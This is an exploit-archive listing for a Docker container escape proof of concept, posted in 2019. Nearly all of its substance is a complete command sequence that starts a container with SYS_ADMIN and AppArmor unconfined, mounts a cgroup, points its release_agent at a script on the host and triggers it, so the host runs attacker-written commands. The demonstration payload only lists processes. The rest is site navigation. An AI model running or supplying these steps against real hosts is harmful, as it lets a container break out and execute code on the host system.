Docker Container Escape

Docker Container Escape: Posted Jul 22, 2019; Authored by dominikczarnotatob; Proof of concept instructions to exploit a Docker container escape vulnerability.; tags | exploit, proof of concept; SHA-256 | 59a356c08ff9521c88b5300d8e1a4bce79db65704f01e01b54cbd581fecab881; Download | Favorite | View

Docker Container Escape

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Top Authors In Last 30 Days

Red Hat 410 files
Ubuntu 104 files
Debian 30 files
Rahad Chowdhury 21 files
BugsBD Limited 21 files
Gentoo 18 files
tmrswrr 14 files
Google Security Research 5 files
Ph0s 5 files
R0ckE7 5 files

File Archives

Systems

AIX (429)
Apple (2,037)
BSD (375)
CentOS (57)
Cisco (1,926)
Debian (6,914)
Fedora (1,692)
FreeBSD (1,246)
Gentoo (4,379)
HPUX (880)
iOS (363)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (47,884)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (486)
RedHat (14,645)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,149)
UNIX (9,340)
UnixWare (187)
Windows (6,607)
Other

Docker Container Escape

Docker Container Escape

File Archive:

December 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Docker Container Escape

Share This

Docker Container Escape

File Archive:

December 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems